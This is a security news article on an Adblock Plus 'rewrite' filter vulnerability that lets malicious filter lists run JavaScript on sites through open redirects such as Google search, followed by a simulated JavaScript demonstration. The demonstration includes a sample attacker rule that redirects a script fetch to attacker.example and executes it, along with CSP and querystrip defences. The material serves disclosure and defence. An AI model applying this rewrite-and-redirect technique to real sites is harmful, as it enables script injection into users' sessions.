Vulnerability in Adblock Plus allows code execution when untrusted filter lists are used

A vulnerability has been identified in the Adblock Plus ad blocker that allows JavaScript code to be executed in the context of web sites when unverified filter lists prepared by an attacker are used (for example, when the user subscribes to a third-party rule set, or when rules are substituted during a MITM attack).

Authors of filter lists can arrange for their code to run in the context of sites the user opens by adding rules with the "rewrite" option, which replaces part of a request URL. The rewrite option does not allow the host of the URL to be changed, but request parameters can be manipulated freely. The replacement may only be plain text, and rewriting is blocked for requests of the script, object and subdocument types.

However, code execution can still be achieved by a workaround.
Some sites, including Google Maps, Gmail and Google Images, dynamically load JavaScript code that is fetched as plain text and then executed. If the origin server allows requests to be redirected, a change to the URL parameters is enough to forward the request to another host (in Google's case, for example, a redirect can be obtained through the "google.com/search" API). Besides hosts with such redirects, the attack also works against services that host user-supplied content (code hosting, article publishing platforms and so on), since the attacker can then place the payload on the same host.

The proposed attack only affects pages that dynamically load strings containing JavaScript code (for example, via XMLHttpRequest or Fetch) and then execute them. Another important limitation is that it requires either a redirect or the ability to place arbitrary data on the origin server that serves the resource. Still, to demonstrate that the attack is practical, it was shown how to get one's own code executed when maps.google.com is opened, using a redirect through "google.com/search".

The fix is still in preparation. The problem also affects the AdBlock and uBlock blockers. The uBlock Origin blocker is not affected, as it does not support the "rewrite" option: its author had earlier refused to add rewrite support, citing potential security problems and the lack of a host-level restriction (instead of rewrite, a querystrip option was proposed that strips query parameters rather than replacing them).

The Adblock Plus developers consider real attacks unlikely, since all changes to the standard rule lists are reviewed and users rarely subscribe to third-party lists. Rule substitution via MITM is prevented by downloading the standard block lists over HTTPS by default (downloading of the remaining lists over HTTP is planned to be disabled in a future release). On the site side, the attack can be blocked with CSP (Content Security Policy) directives, which explicitly define the hosts from which external resources may be loaded.
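To make the mechanics concrete, the following JavaScript is an added illustration written for this page; it is not Adblock Plus, uBlock Origin or Google code, and the hosts example.com and attacker.example, the /redirect endpoint, the response bodies and the rule are all constructed. It models the rewrite option with the same-host and request-type restrictions described above, the page pattern of fetching JavaScript as text and executing it, the open-redirect workaround, and the two defences mentioned on this page: a querystrip-style option and a CSP host allow-list checked on every hop of the request.

```javascript
// Added example, not Adblock Plus or uBlock Origin code: a toy model of the
// "rewrite" filter option, a site that executes text fetched through an
// open redirect, and two defences (querystrip-style option, CSP allow-list).
// Hosts, paths, bodies and the rule below are constructed for illustration.

// Request types for which the article says rewriting is blocked.
const REWRITE_BLOCKED_TYPES = new Set(['script', 'object', 'subdocument']);

// Apply one rewrite rule ({ pattern: RegExp, replacement: string }) to a
// request URL with the restrictions described in the article: the host
// must stay the same and script/object/subdocument requests are untouched.
function applyRewrite(rule, url, type) {
  if (!rule || REWRITE_BLOCKED_TYPES.has(type) || !rule.pattern.test(url)) return url;
  const rewritten = url.replace(rule.pattern, rule.replacement);
  // A rewrite that changes the host is refused, but the query string is free.
  return new URL(rewritten).host === new URL(url).host ? rewritten : url;
}

// Constructed origin server: "/redirect?to=..." is an open redirect.
// Returns the chain of URLs a fetch would visit.
function followRedirects(url) {
  const chain = [url];
  const u = new URL(url);
  if (u.host === 'example.com' && u.pathname === '/redirect' && u.searchParams.has('to')) {
    chain.push(new URL(u.searchParams.get('to'), u).href);
  }
  return chain;
}

// Constructed response bodies, keyed by the final URL of the chain.
const FAKE_BODIES = {
  'https://example.com/bundle.js': 'return "legitimate module";',
  'https://attacker.example/payload.js': 'return "attacker code ran";',
};

// Chain of URLs actually visited once the filter engine has rewritten the
// request (the rewrite happens before the request leaves the browser).
function resolvedChain(rule, url, type = 'xmlhttprequest') {
  return followRedirects(applyRewrite(rule, url, type));
}

// The vulnerable page pattern from the article: fetch JavaScript as plain
// text (XMLHttpRequest/Fetch) and then execute it.
function loadAndRun(rule, url, type = 'xmlhttprequest') {
  const chain = resolvedChain(rule, url, type);
  const body = FAKE_BODIES[chain[chain.length - 1]];
  if (body === undefined) throw new Error('no such resource: ' + chain[chain.length - 1]);
  return new Function(body)(); // the eval sink
}

// Hypothetical attacker rule: keep the host, but point the redirect's "to"
// parameter at the attacker's server. It passes the same-host check because
// the request URL itself still targets example.com.
const maliciousRule = {
  pattern: /^(https:\/\/example\.com\/redirect\?)to=[^&]*(.*)$/,
  replacement: '$1to=https://attacker.example/payload.js$2',
};

// The request the page makes on its own (constructed).
const PAGE_REQUEST = 'https://example.com/redirect?to=https://example.com/bundle.js&v=3';

// Defence 1: a querystrip-style option (what the uBlock Origin author proposed
// instead of rewrite) can only delete a parameter, never inject data into it.
function queryStrip(url, param) {
  const u = new URL(url);
  u.searchParams.delete(param);
  return u.href;
}

// Defence 2: a CSP host allow-list applied to every hop of the fetch, which
// is how connect-src/script-src also constrain redirect targets.
function cspAllowsChain(allowedHosts, chain) {
  return chain.every(hop => allowedHosts.includes(new URL(hop).host));
}

function demo() {
  console.log('no filter rule      :', loadAndRun(null, PAGE_REQUEST));
  console.log('malicious rewrite   :', loadAndRun(maliciousRule, PAGE_REQUEST));
  console.log('type=script request :', loadAndRun(maliciousRule, PAGE_REQUEST, 'script'));
  console.log('after querystrip    :', applyRewrite(maliciousRule, queryStrip(PAGE_REQUEST, 'to'), 'xmlhttprequest'));
  console.log('CSP allows attack?  :', cspAllowsChain(['example.com'], resolvedChain(maliciousRule, PAGE_REQUEST)));
}

demo();
```

Note that the rewrite itself never violates the same-host restriction; the host changes only on the redirect hop, which is why the CSP check has to be evaluated against the whole chain rather than the initial request URL.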

Source: opennet.ru
